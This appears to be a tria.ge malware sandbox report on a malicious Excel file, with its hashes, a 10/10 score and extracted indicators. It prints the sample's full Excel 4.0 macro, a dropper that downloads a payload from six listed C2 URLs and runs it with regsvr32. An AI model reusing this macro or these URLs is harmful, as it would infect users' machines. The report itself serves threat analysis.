Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313

  • Size

    40KB

  • Sample

    241111-zv3j1avqfv

  • MD5

    a76c65d76c17ef921f0dc53e1a29346e

  • SHA1

    81ebd8e04e101b7deb869b243d2ca8c6e1bf7100

  • SHA256

    735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313

  • SHA512

    c72a1604288baaf4723c51dbdcd82b95668aa8d6f5af1260c96c32f3c06216019e2735dff572dba3733755b456be05ae2b7bcc60414f955e43251d148408f64b

  • SSDEEP

    768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://asempaye.com/404/zREXldL8ZfpsEepiC/

https://freesoft18.com/urq/dd1s9WyDLkdM/

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/

https://pedroribeiro.work/wp-admin/qOkQQ/

https://hojeemdia.life/detector/klwHgC9eat/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://asempaye.com/404/zREXldL8ZfpsEepiC/","..\dan.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freesoft18.com/urq/dd1s9WyDLkdM/","..\dan.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/","..\dan.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/","..\dan.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pedroribeiro.work/wp-admin/qOkQQ/","..\dan.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hojeemdia.life/detector/klwHgC9eat/","..\dan.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://asempaye.com/404/zREXldL8ZfpsEepiC/

xlm40.dropper

https://freesoft18.com/urq/dd1s9WyDLkdM/

xlm40.dropper

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/

xlm40.dropper

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/

xlm40.dropper

https://pedroribeiro.work/wp-admin/qOkQQ/

xlm40.dropper

https://hojeemdia.life/detector/klwHgC9eat/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://asempaye.com/404/zREXldL8ZfpsEepiC/

Targets

    • Target

      735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313

    • Size

      40KB

    • MD5

      a76c65d76c17ef921f0dc53e1a29346e

    • SHA1

      81ebd8e04e101b7deb869b243d2ca8c6e1bf7100

    • SHA256

      735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313

    • SHA512

      c72a1604288baaf4723c51dbdcd82b95668aa8d6f5af1260c96c32f3c06216019e2735dff572dba3733755b456be05ae2b7bcc60414f955e43251d148408f64b

    • SSDEEP

      768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks